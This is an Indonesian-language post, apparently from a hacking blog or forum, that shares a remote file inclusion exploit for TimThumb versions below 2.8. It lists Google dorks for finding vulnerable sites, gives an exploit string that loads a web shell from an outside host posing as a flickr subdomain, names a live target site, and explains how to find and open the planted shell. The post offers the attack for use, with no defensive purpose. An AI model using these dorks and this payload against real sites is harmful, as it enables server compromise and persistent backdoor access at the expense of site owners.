-
Hai sobat.
Saya ikal,
Disini saya akan share exploit yang berhubungan dengan timthumb
-
Apasih TimThumb itu?
Timthumb adalah PHP script untuk mengcrop atau meresize sebuah image (foto) dengan cara yang flexibel dan mudah.
Namun ada sebuah celah yang terdapat pada Timthumb dan memungkinkan attacker dapat melakukan inclusi file dari luar server kedalam server (RFI)
Namun di Timthumb ini di beri batasan, atau hanya server-server tertentu yang dapat di accept oleh server timthumb tersebut.
Okeh langsung saja.
Dork : inurl:/timthumb.php
inurl:/thumb.php
inurl:/admin/thumb.php
Note : sebaiknya dorking melalui google image
Exploit :
?src=http://flickr.com.tukangpompajakarta.com/shell.php
Note : exploit ini hanya berlaku untuk v2.8 kebawah, jika v2.8 dan seterusnya maka tidak akan bekerja.
1. Dorking menggunakan dork diatas, jika sudah masuk ketarget, kalian klik open in new tab image yang ada, dan cek url lalu hapus dan sisahkan https atau http sampai timthumb.php
Live target : http://betaapplication.com/homeapp/timthumb.php
2. Kalian tinggal masukan exploitnya dibelakang url atau sesudah /timthumb.php
Dan jika berhasil maka akan muncul seperti ini
Nah, jika sudah seperti itu, kalian tinggal salin saja tulisan dari bagian sesudah /public_html/ sampai .php
Lalu hapus semua url sampai menyusahkan nama domain. Contoh
https://localhost/[path]/timthumb.php?src=exploit
Hapus menjadi
https://localhost/
Dan tempel yang kalian salin tadi ke url.
Dan shell pun terakses
Yaps, mungkin segini aja
Thanks
See u